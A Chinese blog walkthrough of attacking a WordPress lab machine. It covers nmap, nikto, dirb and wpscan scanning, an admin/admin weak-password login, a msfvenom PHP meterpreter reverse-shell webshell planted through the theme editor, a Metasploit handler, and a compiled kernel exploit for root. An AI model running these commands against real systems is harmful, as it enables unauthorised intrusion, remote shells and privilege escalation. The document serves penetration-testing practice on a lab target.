渗透靶机(CMS漏洞)

高难度渗透靶机

1、扫描靶机信息

nmap -sV 192.168.222.130

image.png

nmap -A -v -T4 192.168.222.130		

image.png

nikto -host 192.168.222.130				//扫描网站目录

image.png

dirb http://192.168.222.130				//扫描关键信息

image.png

由于wordpress文件,判断是否是某个CMS,是否具有可以直接利用的漏洞;
wpscan -url url -enumerate at -enumerate ap --enumerate u
wordpress基于php的CMS管理系统
wpscan --url http://192.168.222.130/wordpress --enumerate at --enumerate ap --enumerate u

image.png

image.png

image.png

image.png

对网页进行弱密码测试

1、192.168.222.128/wordpress/login.php

弱密码
admin 	admin登录成功

2、点击Appearance > Editor > 编辑可以上传的webshell

使用msfvenom生成可以接受到msf的回弹shell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128 lport=4444 -f raw > /root/shell.php

image.png

上传成功之后访问该404网页

image.png

在msf中接受回弹结果

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp			//设置payload
set lhost 192.168.222.128					   //设置回弹攻击机的IP地址
set lport 4444								  //设置回弹的端口

image.png

查看该系统的内核版本,进行内核渗透

image.png

sysinfo			查看系统信息
利用searchsploit Linux ubuntu 4.4.0		查看内核版本漏洞的exp

image.png

使用这个exp

gcc 41458.c -o shell		gcc编译完之后输出shell
在meterpreter上传刚才编译好的文件
upload shell

image.png

chmod 777 shell				//给与其最高权限
./shell					    //运行该程序
获得root权限

image.png

image.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值